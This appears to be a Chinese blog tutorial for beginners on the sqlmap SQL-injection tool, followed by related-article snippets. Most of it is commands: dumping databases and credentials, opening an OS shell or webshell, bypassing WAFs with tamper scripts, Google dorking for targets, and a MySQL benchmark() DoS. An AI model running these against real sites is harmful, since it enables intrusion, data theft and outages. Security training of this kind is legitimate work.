滲透測試工具sqlmap基礎教程

2021-09-11 23:18:06 字數 2993 閱讀 9879

滲透測試工具sqlmap基礎教程,從入門到精通

本文僅獻給想學習滲透測試的sqlmap小白,大牛請繞過。

對於網路安全人員來說,掌握滲透工具的使用方法是一項必備的技能。然而,乙個沒有師傅帶領的小白在剛開始學習時,並不知道該如何入手進行滲透學習,所以本文旨在幫助這些小白入門。

sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。它由python語言開發而成,因此執行需要安裝python環境。

既然本文是基礎教程,以下只寫工具的基本使用方法。

mysql資料庫注入

檢查注入點(主要看是否能返回訊息):sqlmap.py -u url

爆所有庫:sqlmap.py -u url -dbs

爆當前庫:sqlmap.py -u url --current-db

2.access資料庫注入

判斷是否是access資料庫:url and exists(select id from msysaccessobjects)

其他資料庫判斷語句:

access: and asc(chr(97))=97

access: and exists(select id from msysaccessobjects)

sql server: and exists(select id from sysobjects)

sql server: and length(user)>0

mysql: and length(user())>

access資料庫沒有庫的概念,直接爆表sqlmap.py -u 「url」 --tables

爆列,爆欄位,可以在日誌裡找到

指定資料庫,作業系統

檢查是否是注入點

爆庫:sqlmap.py -u url --dbms mysql 5.0 --current-db

爆表:sqlmap.py -u url --dbms mysql 5.0 -d cms --tables

爆列:sqlmap.py -u url --dbms mysql 5.0 -d cms -t cms_user --columns

爆欄位:sqlmap.py -u url --dbms mysql 5.0 -d cms -t cms_users -c password ,username --dump

請求延時注入

測試注入點:sqlmap.py -u url -p id

sqlmap注入方式techniquesqlmap.py -u url --technique t

b: 基於boolean的盲注(boolean based blind)

q: 內聯查詢(inlin queries)

t: 基於時間的盲注(time based blind)

u: 聯合查詢(union query based)

e: 錯誤(error based)

s: 棧查詢(stack queries)

猜資料庫sqlmap.py -u url --technique t -time-sec 9 --current-db

其他引數:–delay,–safe-freq

5.常規偽靜態注入

偽靜態:主要是為了隱藏傳遞的引數名,偽靜態只是一種url重寫的手段,既然能接受引數輸入,所以並不能防止注入。目前來看,防止注入的最有效的方法就是使用linq。

加星花:sqlmap.py -u 「url*.html」 --dbs

利用sqlmap注入:sqlmap.py -u 「url*.html」 --current-db --hex

爆表:sqlmap.py -u 「url*.html」 -d 「cms」 --tables –hex

6.cookie注入

burpsuite獲得cookie

sqlmap的cookie注入攻擊:sqlmap.py -u url --cookie 「uname=admin" --level 2

爆庫,爆表,爆列,爆欄位

7.post登入框注入

burpsuite抓包右鍵儲存到\python2\sqlmap中

測試能否注入sqlmap.py -r 1.txt -p user(-r:讓sqlmap載入post請求,-p:指定注入用的引數)

爆庫 sqlmap.py -r 1.txt --current-db

自動搜尋表單:sqlmap.py -u url --form

指定乙個引數:sqlmap.py -u url --data 「name=1&pass=1」

8.互動式寫shell及命令執行

測試注入點:sqlmap.py -u url -p id

利用sqlmap寫webshell:sqlmap.py -u url --os-shell 輸入指令碼語言,輸入**絕對路徑

9.繞過waf防火牆

利用tamper指令碼繞過過濾: sqlmap.py -u url --dbs --batch --flush-session --tamper=equaltolike.py,space2comment.py,randomcase.py

10.sqlmap模板使用,編寫

嘗試注入 and 1=1被攔截

利用%0a嘗試繞過,發現可以

編寫tamper模板,利用sqlmap跑庫(c:\python27\sqlmap\tamper)

利用sqlmap跑庫sqlmap.py -u 「url」 --dbs --batch --tamper=equaltolike.py, space2mssqlhash.py, randomcase.py, space2hassh.py, base64encode.py, charencode.py

11.利用sqlmap來google搜尋

查詢頁面:sqlmap.py -g inurl:php?id=

12.sqlmpa進行mysql dos攻擊

獲得shell:sqlmap.py -u url --sql-shell

進行攻擊:select benchmark(9999999999,0*70726f63409284209)

滲透測試工具 sqlmap

簡單來說 乙個用來做sql注入攻擊的工具 2.配置環境變數 控制面板 系統和安全 系統 高階系統設定 環境變數 找到path 新建黏貼python位址 sqlmap支援五種不同的注入模式 1 基於布林的盲注,即可以根據返回頁面判斷條件真假的注入。2 基於時間的盲注,即不能根據頁面返回內容判斷任何資訊...

滲透測試工具SQLmap

一 簡介 sqlmap 是一款用 python 編寫的開源滲透測試工具,用來自動檢測和利用 sql 注入漏洞。二 windows 下安裝 2.1 安裝 python 環境 注 python 3.0會出錯 python 2.6 且 3.0 2.2 安裝 sqlmap 官方 2.3 配置 將解壓後的 s...

滲透測試工具之sqlmap

滲透測試是一種利用模擬黑客攻擊的方式來評估計算機網路系統安全效能的方法。滲透測試工具很多,其中sqlmap 是乙個開源的滲透測試工具,可以用來進行自動化的檢測,利用sql注入漏洞,獲取資料庫伺服器的許可權。它具有功能強大的檢測引擎,針對各種不同型別資料庫的滲透測試的功能選項,包括獲取資料庫中儲存的資...